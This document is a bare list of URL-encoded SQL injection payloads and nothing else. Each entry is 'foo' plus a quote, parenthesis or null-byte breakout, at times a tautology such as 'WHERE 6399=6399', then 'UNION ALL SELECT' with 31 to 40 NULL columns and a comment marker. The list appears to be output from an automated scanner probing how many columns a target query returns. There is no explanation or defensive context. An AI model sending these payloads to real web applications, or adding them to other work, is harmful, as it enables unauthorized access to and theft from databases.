foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206399%3D6399%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208846%3D8846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206742%3D6742%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203659%3D3659%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203224%3D3224%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%209493%3D9493%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204929%3D4929%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%202227%3D2227%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%209342%3D9342%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208310%3D8310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%201490%3D1490%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%207108%3D7108%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%201902%3D1902%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209131%3D9131%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%207946%3D7946%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%205332%3D5332%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208426%3D8426%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208259%3D8259%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%203814%3D3814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%206169%3D6169%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208270%3D8270%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201497%3D1497%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%204066%3D4066%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%205393%3D5393%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 